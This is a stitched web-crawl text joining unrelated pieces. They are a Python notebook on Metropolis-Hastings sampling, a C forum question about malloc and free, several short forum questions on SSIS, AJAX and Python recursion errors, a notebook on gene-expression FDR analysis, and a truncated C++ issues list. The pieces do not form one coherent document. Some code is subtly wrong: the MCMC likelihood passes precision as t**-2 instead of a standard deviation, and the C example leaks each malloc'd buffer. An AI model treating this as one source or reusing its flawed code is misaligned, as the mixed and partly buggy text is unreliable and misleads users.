The implementation may assume that any thread will eventually do one of the following: terminate, make a call to a library I/O function, access or modify a volatile object, or perform a synchronization operation or an atomic operation.
Some programmers find this liberty afforded to implementations to be disadvantageous; see this blog post for a discussion of the subject.
There is a discrepancy between the syntaxes allowed for defining a constructor and a destructor of a class template. For example:
template <class> struct S {
    S();
    ~S();
};

template <class T> S<T>::S<T>() { }    // error
template <class T> S<T>::~S<T>() { }   // okay
The reason for this is that 3.4.3.1 [class.qual] paragraph 2 says that S::S is “considered to name the constructor,” which is not a template and thus cannot accept a template argument list. On the other hand, the second S in S::~S finds the injected-class-name, which “can be used with or without a template-argument-list” (14.6.1 [temp.local] paragraph 1) and thus satisfies the requirement to name the destructor's class (12.4 [class.dtor] paragraph 1).
Would it make sense to allow the template-argument-list in the constructor declaration and thus make the language just a little easier to use?
Rationale (July, 2007):
The CWG noted that the suggested change would be confusing in the case where the class template had both template and non-template constructors.
3.5 [basic.link] paragraph 8 says,
A name with no linkage (notably, the name of a class or enumeration declared in a local scope (3.3.3 [basic.scope.block])).

7.1 [dcl.type.cv] paragraph 4 already forbids modifying a const member of a POD struct. The prohibition need not be repeated in 3.9 [basic.types].
Rationale (June, 2008):
A copy constructor takes a reference as its first parameter, thus no user-declared copy constructor can be constexpr.

3.9.1 [basic.fundamental] paragraph 6 states,
As described below, bool values behave as integral types.
This sentence looks definitely out of order: how can a value behave as a type?
Suggested resolution:
Remove the sentence entirely, as it doesn't supply anything that isn't already stated in the following paragraphs and in the referenced section about integral promotion.
Rationale (July, 2007):
This is, at most, an editorial issue with no substantive impact. The suggestion has been forwarded to the project editor for consideration..
Paragraph 3 of section 4.2.
There is no normative requirement regarding the ability of floating-point values to represent integer values exactly; however, 4..11 .
5.1.5 [expr.prim.lambda] paragraph 2 says,
A closure object behaves as a function object (20.14 [function.objects])...
This linkage to <functional> increases the dependency of the language upon the library and is inconsistent with the definition of “freestanding” in 17.6.1.3 [compliance].
Rationale (July, 2009):
The reference to 20.14 [function.objects] appears in a note, not in normative text, and is intended only to clarify the meaning of the term “function object.” The CWG does not believe that this reference creates any dependency on any library facility..
Rationale (October, 2009):
The consensus of the CWG was that this is not a sufficiently important problem to warrant changing the existing specification.
According to 5.1.5 .5 .5 ...
According to 5.2.1 [expr.sub] paragraph 11,
No entity is captured by an init-capture.
It should be made clearer that a variable, odr-used by an init-capture in a nested lambda, is still captured by the containing lambda as a result of the init-capture.
Rationale (October, 2015):
Subsequent edits have removed the offending phraseXS.
Should the determination of array bounds from an initializer, described in 8.
.
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173..
In 5.3.1 [expr.unary.op], part of paragraph 7 describes how to compute the negative of an unsigned quantity:
The negative of an unsigned quantity is computed by subtracting its value from 2n, where n is the number of bits in the promoted operand. The type of the result is the type of the promoted operand.
According to this method, -0U will get the value 2n - 0 = 2n, where n is the number of bits in an unsigned int. However, 2n is obviously out of the range of values representable by an unsigned int and thus not the actual value of -0U. To get the result, a truncating conversion must be applied.
Rationale (April, 2007):
As noted in the issue description, a “truncating conversion” is needed. This conversion is supplied without need of an explicit mention, however, by the nature of unsigned arithmetic given in 3.9.1 [basic.fundamental] paragraph 4:
Unsigned integers, declared unsigned, shall obey the laws of arithmetic modulo 2n where n is the number of bits in the value representation of that particular size of integer.
The standard forbids a lambda from appearing in a sizeof operand:
A lambda-expression shall not appear in an unevaluated operand (Clause 5 [expr]).
(5.1.5 [expr.prim.lambda] paragraph 2). However, there appears to be no prohibition of the equivalent usage when a variable or data member has a closure class as its type:
int main() {
  int i = 1;
  int j = 1;
  auto f = [=]{ return i + j; };
  return sizeof(f);
}
According to 5.1.5 .
The relational operators have unspecified results when comparing pointers that refer to objects that are not members of the same object or elements of the same array (5.9 [expr.rel] paragraph 2, second bullet). This restriction (which dates from C89) stems from the desire not to penalize implementations on architectures with segmented memory by forcing them essentially to simulate a flat address space for the purpose of these comparisons. If such an implementation requires that objects and arrays to fit within a single segment, this restriction enables pointer comparison to be done simply by comparing the offset portion of the pointers, which could be much faster than comparing the full pointer values.
The problem with this restriction in C++ is that it forces users of the Standard Library containers to use less<T*> instead of the built-in < operator to provide a total ordering on pointers, a usage that is inconvenient and error-prone. Can the existing restriction be relaxed in some way to allow the built-in operator to provide a total ordering? (John Spicer pointed out that the actual comparison for a segmented architecture need only supply a total ordering of pointer values, not necessarily the complete linearization of the address space.)
Rationale (April, 2007):
The current specification is clear and was well-motivated. Analysis of whether this restriction is still needed should be done via a paper and discussed in the Evolution Working Group rather than being handled by CWG as an issue/defect..
Consider:
int* p = false; // Well-formed?
int* q = !1;    // What about this?

From 3.9.1 [basic.fundamental] paragraph 6: "As described below, bool values behave as integral types."
From 4.11 [conv.ptr] paragraph 1: "A null pointer constant is an integral constant expression rvalue of integer type that evaluates to zero."
From 5 type.]), [intro.defs] in that translation unit.
Rationale (October, 2004):
CWG felt that readers might misunderstand “declaration” as meaning “non-definition declaration.”.
9.
7.1.1 [dcl.stc] paragraph 7 seems out of place in the current organization of the Standard::.....6.4.6 [replacement.functions], 18.6.2.1 [new.delete.single] par 2, and 3.7.4 [basic.stc.dynamic] par 2-3. I don't see anything explicitly saying that the replacement function may not be inline. The closest I can find is 18.6.2.1 ...2.2.1 [class.this] paragraph 1 allows use of this only in the body of a non-static member function, and the return type is not part of the function-body.
Do we want to change the rules to allow these kinds of decltype expressions?
Rationale (February, 2008):
In the other cases where a class type is considered complete within the definition of the class, it is possible to defer handling the construct until the end of the definition. That is not possible for types, as the type may be needed immediately in subsequent declarations.
It was also noted that the primary utility of decltype is in generic contexts; within a single class definition, other mechanisms are possible (e.g., use of a member typedef in both the declaration of the operand of the decltype and to replace the decltype itself).
The first bullet of 7.1.7.2 [dcl.type.simple] paragraph 4 says,
There are two clarifications to this specification that would assist the reader. First, it would be useful to have a note highlighting the point that a parenthesized expression is neither an id-expression nor a member access expression.
Second, the phrase “the type of the entity named by e” is unclear as to whether cv-qualification in the object or pointer expression is or is not part of that type. Rephrasing this to read, “the declared type of the entity,” or adding “(ignoring any cv-qualification in the object expression or pointer expression),” would clarify the intent.
Rationale (February, 2008):
The text is clear enough. In particular, both of these points are illustrated in the last two lines of the example contrasting decltype(a->x) and decltype((a->x)): in the former, the expression has no parentheses, thus satisfying the requirements of the first bullet and yielding the declared type of A::x, while the second has parentheses, falling into the third bullet and picking up the const from the object expression in the member access.
Because type deduction for the auto specifier is described in 7.1.
Rationale (September, 2008):
It is important that the deduction rules be the same in the function and auto cases. The result of this example might be surprising, but maintaining a consistent model for deduction is more important.
An initializer list is treated differently in deducing the type of an auto specifier and in a function call. In 7.1.7.4 [dcl.spec.auto] paragraph 6, an initializer list is given special treatment so that auto is deduced as a specialization of std::initializer_list:
Once the type of a declarator-id has been determined according to 8.3 [dcl.meaning], either a new invented type template parameter U or, if the initializer is a braced-init-list (8++..4.1 [basic.stc.dynamic.allocation] paragraph 1, 3.7.
Rationale (July, 2009):
The current specification does not restrict injection of names in elaborated-type-specifiers, and the consensus of the CWG was that no change is needed on this point...
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173.
.
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173.)..
The [[noreturn]] attribute, as specified in 7.6.8 ..
According to 8.3.4 [dcl.array] paragraph 1,
In a declaration T D where D has the form
D1 [ constant-expressionopt ] attribute-specifieropt
and the type of the identifier in the declaration T D1 is “derived-declarator-type-list T”, then the type of the identifier of D is an array type; if the type of the identifier of D contains the auto type-specifier, the program is ill-formed.
This.6.3 [dcl.init.ref] paragraph 3 for function types. _N4567_.
In section 8.
According to the logic in 8.6.3 [dcl.init.ref] paragraph 5 as follows:
...
If the initializer expression is a string literal (2.6 [dcl.init] and follow the logic ladder there with the element,” the logical result is that an initializer for a scalar could be arbitrarily deeply nested in braces, with each trip through the 8.6 [dcl.init] / 8.6.4 [dcl.init.list] recursion peeling off one layer. Presumably that is not intended.
Rationale (October, 2012):
The wording “a single element of type E” excludes the case of a nested braced initializer, because such an element has no type.
If an initializer_list object is copied and the copy is elided, is the lifetime of the underlying array object extended? E.g.,
void f() {
  std::initializer_list<int> L =
    std::initializer_list<int>{1, 2, 3}; // Lifetime of array extended?
}
The current wording is not clear.
(See also issue 1299.)
Notes from the October, 2012 meeting:
The consensus of CWG was that the behavior should be the same, regardless of whether the copy is elided or not.
Rationale (November, 2016):
With the adoption of paper P0135R1, there is no longer any copy in this example to be elided.
According to 8.
[Detailed description pending.]
Rationale (November, 2016):
The reported issue is no longer relevant to the current working paper..2.
Another instance to consider is that of invoking a member function from a null pointer:
struct A { void f () { } };

int main () {
  A* ap = 0;
  ap->f ();
}
Which is explicitly noted as undefined in 9.2.2 [class.mfct.non-static],.
The current wording of 9.2 incorrect.
9.2.1 [class.mfct] paragraph 5 says this about member functions defined lexically outside the class:
the member function name shall be qualified by its class name using the :: operator
9.2.3.2 [class.static.data] paragraph 2 says this about static data members:
In the definition at namespace scope, the name of the static data member shall be qualified by its class name using the :: operator
I would have expected similar wording in 9.2.5 [class.nest] paragraph 3 for nested classes. Without such wording, the following seems to be legal (and is allowed by all the compilers I have):
struct base { struct nested; };
struct derived : base {};
struct derived::nested {};
Is this just an oversight, or is there some rationale for this behavior?
Rationale (July, 2008):
The wording in 9 [class] paragraph 10 (added by the resolution of issue 284, which was approved after this issue was raised).
Is this legal? Should it be?
struct E { union { struct { int x; } s; } v; };
One compiler faults a type definition (i.e. of the anonymous struct) since it is in an anonymous union [9.
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173.
Can a member of a union be of a class that has a user-declared non-default constructor? The restrictions on union membership in 9.
Rationale (August, 2011):
As given in the preceding note.
According to 9.4 _N4567_.
After the adoption of the wording for extended friend declarations, we now have this new paragraph in 11 a friend declaration designates a (possibly cv-qualified) class type or a class template, that class or template is declared as a friend; otherwise, the friend declaration is ignored. [Example:...
Rationale (September, 2008):
The proposed extension is not needed. The template case can be handled simply by providing a template header:
template <typename T> friendE..
The current wording of the Standard does not make clear whether a special member function that is defaulted and implicitly deleted is trivial. Triviality is visible in various ways that don't involve invoking the function, such as determining whether a type is trivially copyable and determining the result of various type traits. It also factors into some ABI specifications.
(See also issue 1734.)
Notes from the June, 2014 meeting:
CWG felt that deleted functions should be trivial. See also issue 1590.
Additional note, November, 2014:
See paper N4148..
Consider the following example:
template<typename T, T V, int n = sizeof(V)> using X = int[n];
template<typename T> void f(X<T, 0>*) {}
void g() {
  f<char>(0);
}
Current implementations get confused here because they substitute V=0 into the default argument of X before knowing the type T and end up with f having type void (int (*)[sizeof(0)]), that is, the array bound does not depend on T. It's not clear what should happen here.
Rationale (March, 2016):
There is no problem with the specification, only with the implementations; the default argument for n is dependent because V has a dependent type....
Note (March, 2008):
The Evolution Working Group recommended closing this issue with no further consideration. See paper J16/07-0033 = WG21 N2173.. [intro.defs] “undefined behavior.”.7.4 .2.,
template<class T> struct A {
  enum E : T;
  enum class S : T;
};
template<> enum A<int>::E : int { eint };          // OK
template<> enum class A<int>::S : int { sint };    // OK
template<class T> enum A<T>::E : T { eT };
template<class T> enum class A<T>::S : T { sT };
template<> enum A<char>::E : int { echar };        // ill-formed, A<char>::E was instantiated
                                                   // when A<char> was instantiated
template<> enum class A<char>::S : int { schar };  // OK.
It is not clear whether the following common practice is valid by the current rules:
// foo.h
template<typename T> struct X {
  int f(); // never defined
};

// foo.cc
#include "foo.h"
template<> int X<int>::f() { return 123; }

// main.cc
#include "foo.h"
int main() {
  return X<int>().f();
}
Relevant rules include 14 [temp] paragraph 6,
A function template, member function of a class template, variable template, or static data member of a class template shall be defined in every translation unit in which it is implicitly instantiated (14.7.1 [temp.inst]) unless the corresponding specialization is explicitly instantiated (14.7.2 [temp.explicit]) in some translation unit; no diagnostic is required.
14.7.1 [temp.inst] paragraph 2,
Unless a member of a class template or a member template has been explicitly instantiated or explicitly specialized, the specialization of the member is implicitly instantiated when the specialization is referenced in a context that requires the member definition to exist...
and 14.7.3 [temp.expl.spec] paragraph 6:
If a template, a member template or a member of a class template is explicitly specialized then that specialization shall be declared before the first use of that specialization that would cause an implicit instantiation to take place, in every translation unit in which such a use occurs; no diagnostic is required. If the program does not provide a definition for an explicit specialization and either the specialization is used in a way that would cause an implicit instantiation to take place or the member is a virtual member function, the program is ill-formed, no diagnostic required. An implicit instantiation is never generated for an explicit specialization that is declared but not defined.
The intent appears to be that the reference in main.cc violates two rules: it implicitly instantiates something for which no definition is provided and that is not explicitly instantiated elsewhere, and it also causes an implicit instantiation of something explicitly specialized in another translation unit without a declaration of the explicit specialization.
Rationale (March, 2016):
As stated in the analysis, the intent is for the example to be ill-formed, no diagnostic required...
Rationale (February, 2008):
In the absence of a compelling need, the CWG felt that it was better not to change the existing rules. Allowing this case could cause a quiet change to the meaning of a program, because attempting to create a pointer to a reference type is currently a deduction failure...8.2.4 [temp.deduct.partial] paragraph 5). This means that neither parameter type is at least as specialized as the other (paragraph 8).
According to 14.).
[Detailed description pending.]
Rationale (November, 2016):
The reported issue is no longer relevant after the adoption of paper P0490R0 at the November, 2016 meeting.
[Detailed description pending.]
Rationale (November, 2016):
The reported issue is no longer relevant after the adoption of paper P0490R0 at the November, 2016 meeting..11 . 133...7 [depr.uncaught]..
Rationale (September, 2008):
It is unclear what effect the provision of “unique mappings” has or if a conforming program could detect the failure of an implementation to do so. There has been a significant effort to synchronize this clause with the corresponding section of the C99 Standard, and given the lack of perceptible impact of the proposed change, there is insufficient motivation to introduce a new divergence in the wording.
According to 16.2 [cpp.include] paragraph 4,
A preprocessing directive of the form
# include pp-tokens new-line
..
Rationale (October, 2008):
It was noticed that issue 353, an exact duplicate of this one, was independently opened and resolved.
According to..2.1 [class.mfct]) or static data member (9.2::*)[]);.
It is not clear whether the following declaration is well-formed:
struct S { int i; } s = { { 1 } };

According to 8.6.1 [dcl.init.aggr] paragraph 2, a brace-enclosed initializer is permitted for a subaggregate of an aggregate; however, i is a scalar, not an aggregate. 8.6 [dcl.init] paragraph 13 says that a standalone declaration like

int i = { 1 };

is permitted, but it is not clear whether this says anything about the form of initializers for scalar members of aggregates.
This is (more) clearly permitted by the C89 Standard.
Rationale (May, 2008):
Issue 632 refers to exactly the same question and has a more detailed discussion of the considerations involved.
In an example like
const int& r{1};
the expectation is that this creates a temporary of type const int containing the value 1 and binds the reference to it. And it does, but along the way it creates two temporaries. The wording in 8.2.3.2 [class.static.data] paragraph 3 says,
If a static data member is of const literal type, its declaration in the class definition can specify a brace-or-equal-initializer in which every initializer-clause that is an assignment-expression is a constant expression..6.3 [dcl.init.ref] did have distinct bullets for converting to an “lvalue” and to an “rvalue;” we now have a bullet which is not exclusively one or the other.
Possible fix
Add reference to [13.3.1.6 [over.match.ref]] in 8.6.3 [dcl.init.ref] for direct binding to rvalue reference/const non-volatile via UDC.
Remove redundant sentence referring to second SCS.
Modify example to indicate operator int&() is not a candidate function.
Clarify that the point from 8.
Consider the following example:
template<typename ...T> struct X {
  void f();
  static int n;
};
template<typename T, typename U> using A = T;
template<typename ...T> void X<A<T, decltype(sizeof(T))>...>::f() {}
template<typename ...T> int X<A<T, decltype(sizeof(T))>...>::n = 0;
void g() {
  X<void>().f();
  X<void>::n = 1;
}
Should this be valid? The best answer would seem to be to produce an error during instantiation, and that appears to be consistent with the current Standard wording, but there is implementation divergence.
See also issue 2021.
Rationale (May, 2015):
This issue is a duplicate of issue 1979.
The description of how the partial ordering of template functions is determined in 14.5..
The example in 18.6.2.3 ..11 object type or a function type, and CV1 and CV2 are cv-qualifier-seqs, there exist candidate operator functions of the form
CV12 T& operator->*(CV1 C1*, CV2 T C2::*);
where CV12 is the union of CV1 and CV2.
C1 and C2 should be effective class types (cf. 5.5 [expr.mptr.oper] paragraph 3).
Also, should the relationship between those two classes be expressed as std::SameType or std::DerivedFrom requirements?..).
Rationale (July, 2009):
This suggestion would need a full proposal and discussion by the EWG before the CWG could consider it..12 .5 by EWG. current wording of the Standard appears to permit code like
void f(const char (&)[10]);
void g() {
  f("123");
  f({'a','b','c','\0'});
}
creating a temporary array of ten elements and binding the parameter reference to it. This is controversial and should be reconsidered. (See issues 1058 and 1232.)
Rationale (March, 2016):
Whether to support creating a temporary array in such cases is a question of language design and thus should be?
Current implementations ignore narrowing conversions during overload resolution, emitting a diagnostic if calling the selected function would involve narrowing. For example:
struct s { long m; };
struct ss { short m; };
void f( ss );
void f( s );
void g() {
  f({ 1000000 }); // Ambiguous in spite of narrowing for f(ss)
}
However, the current wording of 13.3.3.1.5 [over.ics.list] paragraph 7 says,
Otherwise, if the parameter has an aggregate type which can be initialized from the initializer list according to the rules for aggregate initialization (8.6.1 [dcl.init.aggr]), the implicit conversion sequence is a user-defined conversion sequence with the second standard conversion sequence an identity conversion.
In the example above, ss cannot be initialized from { 1000000 } because of the narrowing conversion, so presumably f(ss) should not be considered. If this is not the intended outcome, paragraph 7 should be restated in terms of having an implicit conversion sequence, as in, e.g., bullet 9.1, instead of a valid initialization.
Rationale (March, 2016):
This is a question of language design and thus more suited to consideration by EWG.. | http://www.open-std.org/jtc1/sc22/wg21/docs/cwg_closed.html | CC-MAIN-2018-05 | en | refinedweb |
std::reverse not supported?
Hi all,
I'm new to c++ and Qt. I am, and have been a C# VS dev since, well, before it was released and was a Java guy before that. Now that you know who I am, here's my issue I'm having:
I have a solution that was developed in VS. Within that solution is a vectorUtil.h file. In that file is a method called Reverse which uses void std::reverse( BidirIt first, BidirIt last ). I know that it may be frowned upon to have implementation in a .h file but I didn't write it.
However, when I integrated the code into a Qt project (Qt Creator 4.3.1 Community), it issues a compile-time error that states, 'reverse' was not declared in this scope. It doesn't appear in intellisense (or whatever it's called in Qt). It's almost as if it's not in the std library. Anybody have any insight?
I've bold'd the line that the compiler is puking on. Here is the relevant code and includes:
#pragma once

#ifdef DLL_EXPORT_WIN32
#ifdef UTILITIES_EXPORTS
#define UTILITIES_API __declspec(dllexport)
#else
#define UTILITIES_API __declspec(dllimport)
#endif
#else
#define UTILITIES_API
#endif

#include <vector>
#include <string>

using namespace std;

namespace Utilities
{
    /// <summary>
    /// Class Property.
    /// Helps with creating abstractions
    /// </summary>
    class UTILITIES_API VectorUtil
    {
    public:
        /// <summary>
        /// Reverses the specified data.
        /// </summary>
        /// <param name="data" type="vector<BYTE>&">The data.</param>
        /// <returns>std.vector<_Ty, _Alloc>.</returns>
        template<class Type>
        static vector<Type> Reverse(vector<Type>& data)
        {
            vector<Type> reverseData(data.size());
            Copy(data, 0, reverseData, 0, reverseData.size());
            reverse(begin(reverseData), end(reverseData)); // <-- error: 'reverse' was not declared in this scope
            return reverseData;
        }
    };
}
You're missing the
#include <algorithm>, see for instance cplusplus.com.
Thank you for your response Johan. I had thought that too. I added the #include <algorithm> and then, upon compiling, got the following error:
[copydata] Error 4
It's really descriptive and lets me know exactly what is wrong. In searching for it online, I found troves of information on the error... ok, not really. It's not descriptive and there is nothing online about that error that I can find :) However I did notice that I'm on 5.8 and need to be on 5.9.1. I'll update and report back.
We can put this one to rest. I upgraded to 5.9.1 and that did the trick. Thanks! | https://forum.qt.io/topic/82801/std-reverse-not-supported | CC-MAIN-2018-05 | en | refinedweb |
Hi Benji > Betreff: Re: AW: [Zope3-dev] Why do we restrict our egg testing?
[...]

> Second, why would you include all of the zope.* eggs if that
> particular package doesn't depend on them?

That's the point which I don't understand and that nobody is seeing: it is not my egg that depends on other packages. Other packages depend on the egg I develop. And the tests are there to ensure that other eggs will work with my work on a specific egg. Tests are a set of tools which can ensure that my changes are compatible with existing things.

> > Is there a benefit to not depend on all zope.* packages in each egg
> > test setup if we do a transition to individual packages?
> >
> > I understand the benefit to have smaller dependencies in eggs, but I
> > still think an egg should run all tests we have in the zope namespace.
> > Like we did in our old trunk setup.
> > This would allow us to run all zope.* tests during egg development.
>
> It sounds like it would build the equivalent of the old-style
> Zope 3 trunk for each and every zope.* buildout. That sounds
> awful. Perhaps I'm misunderstanding your proposal.

All zope.* tests together are a way to ensure compatibility. It doesn't make sense to me to not participate in all tests before a single egg gets deployed. Not running all tests in a namespace like we have with the zope package namespace sounds to me like a package which doesn't want to agree on all tests should get moved to another namespace.

Regards
Roger Ineichen

> --
> Benji York
> Senior Software Engineer
> Zope Corporation
> _______________________________________________

Zope3-dev mailing list
Zope3-dev@zope.org
Unsub:
Now, let's say you have to do some analysis on layers inside the group layers, you can loop the layers as follows:
import arcpy
mxdPath = r"c:\temp\mapDoc.mxd"
mxd = arcpy.mapping.MapDocument(mxdPath)
layers = arcpy.mapping.ListLayers(mxd)
for layer in layers:
if layer.isGroupLayer:
for subLayer in layer:
print "This layer is in a group layer: " + str(subLayer.name)
This will print a list of layer contained in a groupLayer. | https://anothergisblog.blogspot.com/2011/07/arcpy-looking-inside-group-layers.html | CC-MAIN-2018-05 | en | refinedweb |
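Note that the loop above only descends one level, and group layers can themselves contain group layers. Below is a sketch of a recursive walk. The FakeLayer class is a hypothetical stand-in of my own so the snippet runs without ArcGIS; with arcpy you would instead pass in the result of arcpy.mapping.ListLayers(mxd):

```python
def walk_layers(layers):
    """Return the names of all non-group layers, however deeply nested."""
    names = []
    for layer in layers:
        if layer.isGroupLayer:
            # In arcpy a group layer is iterable over its sub-layers;
            # recurse so nested groups are handled too.
            names.extend(walk_layers(list(layer)))
        else:
            names.append(layer.name)
    return names


# Hypothetical stand-in for arcpy layer objects, purely for demonstration.
class FakeLayer:
    def __init__(self, name, sublayers=None):
        self.name = name
        self._sub = sublayers or []
        self.isGroupLayer = bool(sublayers)

    def __iter__(self):
        return iter(self._sub)


group = FakeLayer("Group", [FakeLayer("Roads"),
                            FakeLayer("Nested", [FakeLayer("Rivers")])])
print(walk_layers([group]))  # ['Roads', 'Rivers']
```

With a real map document, `walk_layers(arcpy.mapping.ListLayers(mxd))` would return every non-group layer name regardless of nesting depth.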
Problem
I want to implement an algorithm from an unpublished paper by my supervisor and as part of that, I need to construct a covariance matrix C using some rules given in the paper. I'm coming from Matlab and wanted to take this opportunity to finally learn Python, hence my question: How do I do this in the most efficient (fast) way in Python (including numpy,scipy)?
Subproblem 1:
cov(Xs, Xt) = min{s,t} − st
First off, for others who may come across this question in the future: If you did have data and were wanting to estimate a covariance matrix, as several people have noted, use np.cov or something similar.
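As a side note on that estimation case — a minimal sketch (the random data and variable names here are mine, purely for illustration):

```python
import numpy as np

rng = np.random.default_rng(0)
# 1000 observations of 3 variables; np.cov expects one variable per row
data = rng.normal(size=(3, 1000))

est_cov = np.cov(data)
print(est_cov.shape)  # (3, 3)
```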
However, your question is about how to build a large matrix given some pre-defined rules. To clear up some confusion in the comments: Your question doesn't seem to be about estimating a covariance matrix, it's about specifying one. In other words, you're asking how to build up a large array given some pre-defined rules.
Which way is most efficient is going to depend on what you're doing in detail. Most performance tricks in this case will involve exploiting symmetry in the calculation you're performing. (For example, is one row going to be identical?)
It's hard to say anything specific without knowing exactly what you're doing. Therefore, I'll focus on how to do this type of thing in general. (Note: I just noticed your edit. I'll include an example for a Brownian Bridge in just a bit...)
The most basic case is a constant row or column in the output array. It's easy to create the array and assign values to a column or row using slicing syntax:
import numpy as np

num_vars = 10**4
cov = np.zeros((num_vars, num_vars), dtype=float)
To set an entire column/row:
# Third column will be all 9's
cov[:,2] = 9
# Second row will be all 1's (will overwrite the 9 in col3)
cov[1,:] = 1
You can also assign arrays to columns/rows:
# 5th row will have random values
cov[4,:] = np.random.random(num_vars)
# 6th row will be the sequence of squares 0, 1, 4, ...
cov[5,:] = np.arange(num_vars)**2
In many cases (but probably not this exact case) you'll want to build up your output from existing arrays. You can use vstack/hstack/column_stack/tile and many other similar functions for this.
A good example is if we're setting up a matrix for a linear inversion of a polynomial:
import numpy as np

num = 10
x = np.random.random(num)  # Observation locations

# "Green's functions" for a second-order polynomial
# at our observed locations
A = np.column_stack([x**i for i in range(3)])
However, this will build up several temporary arrays (three, in this case). If we were working with a 10000-dimensional polynomial with 10^6 observations, the approach above would use too much RAM. Therefore, you might iterate over columns instead:
ndim = 2
A = np.zeros((x.size, ndim + 1), dtype=float)
for j in range(ndim + 1):
    A[:,j] = x**j
In most cases, don't worry about the temporary arrays. The column_stack-based example is the right way to go unless you're working with relatively large arrays.
Without any more information, we can't exploit any sort of symmetry. The most general way is to just iterate through. Typically you'll want to avoid this approach, but sometimes it's unavoidable (especially if the calculation depends on a previous value).
Speed-wise this is identical to nested for loops, but it's easier (especially for >2D arrays) to use np.ndindex instead of multiple for loops:
import numpy as np

num_vars = 10**4
cov = np.zeros((num_vars, num_vars), dtype=float)

for i, j in np.ndindex(cov.shape):
    # Logic presumably in some function...
    cov[i, j] = calculate_value(i, j)
In many cases, you can vectorize index-based calculations. In other words, operate directly on arrays of the indices of your output.
Let's say we had code that looked like:
import numpy as np

cov = np.zeros((10, 10), dtype=float)
for i, j in np.ndindex(cov.shape):
    cov[i,j] = i*j - i
We could replace that with:
i, j = np.mgrid[:10, :10]
cov = i*j - i
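As an aside (my addition, not from the original answer): np.fromfunction expresses the same index-based construction by handing your function the index arrays directly:

```python
import numpy as np

# fromfunction calls the lambda once with full index arrays, not per element
cov = np.fromfunction(lambda i, j: i * j - i, (10, 10), dtype=float)

# Same result as the mgrid version
i, j = np.mgrid[:10, :10]
assert np.array_equal(cov, i * j - i)
```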
As another example, let's build up a 100 x 100 "inverted cone" of values:
# The complex numbers in "mgrid" give the number of increments
# mgrid[min:max:num*1j, min:max:num*1j] is similar to
# meshgrid(linspace(min, max, num), linspace(min, max, num))
y, x = np.mgrid[-5:5:100j, -5:5:100j]

# Our "inverted cone" is just the distance from 0
r = np.hypot(x, y)
This is a good example of something that can be easily vectorized. If I'm reading your example correctly, you'd want something similar to:
import numpy as np st = np.mgrid[1:101, 1:101] s, t = st cov = st.min(axis=0) - s * t
Overall, I've only touched on a few general patterns. However, hopefully this gets you pointed in the right direction. | https://codedump.io/share/H7DVoTauFMDb/1/building-a-covariance-matrix-in-python | CC-MAIN-2018-05 | en | refinedweb |
General
Transform
General Transform
General Transform
Class
Definition
Provides generalized transformation support for objects. GeneralTransform is a base class that's in the hierarchy of practical transform classes such as TranslateTransform.
public : class GeneralTransform : DependencyObject, IGeneralTransform, IGeneralTransformOverrides
public class GeneralTransform : DependencyObject, IGeneralTransform, IGeneralTransformOverrides
Public Class GeneralTransform Inherits DependencyObject Implements IGeneralTransform, IGeneralTransformOverrides
- Inheritance
- GeneralTransformGeneralTransformGeneralTransform
- Attributes
-.
Constructors
Provides base class initialization behavior for GeneralTransform -derived classes.
protected : GeneralTransform()
protected GeneralTransform()
Protected Sub New()
Properties)
Gets the inverse transformation of this GeneralTransform, if possible.
public : GeneralTransform Inverse { get; }
public GeneralTransform Inverse { get; }
Public ReadOnly Property Inverse As GeneralTransform
An inverse of this instance, if possible; otherwise null.
Implements the behavior for return value of Inverse in a derived or custom GeneralTransform.
protected : virtual GeneralTransform InverseCore { get; }
protected virtual GeneralTransform InverseCore { get; }
Protected Overridable ReadOnly Property InverseCore As GeneralTransform
The value that should be returned as Inverse by the GeneralTransform.
Methods
ClearValue(DependencyProperty) ClearValue(DependencyProperty) ClearValue(DependencyProperty)
Clears the local value of a dependency property.(Inherited from DependencyObject)
GetAnimationBaseValue(DependencyProperty) GetAnimationBaseValue(DependencyProperty) GetAnimationBaseValue(DependencyProperty)
Returns any base value established for a dependency property, which would apply in cases where an animation is not active.(Inherited from DependencyObject)
GetValue(DependencyProperty) GetValue(DependencyProperty) GetValue(DependencyProperty)
Returns the current effective value of a dependency property from a DependencyObject.(Inherited from DependencyObject)
ReadLocalValue(DependencyProperty) ReadLocalValue(DependencyProperty) ReadLocalValue(DependencyProperty)
Returns the local value of a dependency property, if a local value is set.(Inherited from DependencyObject))
SetValue(DependencyProperty,Object) SetValue(DependencyProperty,Object) SetValue(DependencyProperty,Object)
Sets the local value of a dependency property on a DependencyObject.(Inherited from DependencyObject)
Transforms the specified bounding box and returns an axis-aligned bounding box that is exactly large enough to contain it.
public : Rect TransformBounds(Rect rect)
public Rect TransformBounds(Rect rect)
Public Function TransformBounds(rect As Rect) As Rect
Provides the means to override the TransformBounds behavior in a derived transform class.
protected : virtual Rect TransformBoundsCore(Rect rect)
protected virtual Rect TransformBoundsCore(Rect rect)
Protected Overridable Function TransformBoundsCore(rect As Rect) As Rect
Uses this transformation object's logic to transform the specified point, and returns the result.
public : Point TransformPoint(Point point)
public Point TransformPoint(Point point)
Public Function TransformPoint(point As Point) As.
- See Also
-
Attempts to transform the specified point and returns a value that indicates whether the transformation was successful.
public : Platform::Boolean TryTransform(Point inPoint, Point outPoint)
public bool TryTransform(Point inPoint, Point outPoint)
Public Function TryTransform(inPoint As Point, outPoint As Point) As bool
true if inPoint was transformed; otherwise, false.
Provides the means to override the TryTransform behavior in a derived transform class.
protected : virtual Platform::Boolean TryTransformCore(Point inPoint, Point outPoint)
protected virtual bool TryTransformCore(Point inPoint, Point outPoint)
Protected Overridable Function TryTransformCore(inPoint As Point, outPoint As Point) As bool
true if inPoint was transformed; otherwise, false.
UnregisterPropertyChangedCallback(DependencyProperty,Int64) UnregisterPropertyChangedCallback(DependencyProperty,Int64) UnregisterPropertyChangedCallback(DependencyProperty,Int64)
Cancels a change notification that was previously registered by calling RegisterPropertyChangedCallback.(Inherited from DependencyObject) | https://docs.microsoft.com/en-us/uwp/api/Windows.UI.Xaml.Media.GeneralTransform | CC-MAIN-2018-05 | en | refinedweb |
Each record in the Medicare payment database summarizes a single type of service provided by a single provider. Each provider belongs to a "provider type" category. There are around 2700 different service types and around 80 different provider types.
A provider of a given type can engage in various services. In this notebook, we explore the relationships between provider types and service types.
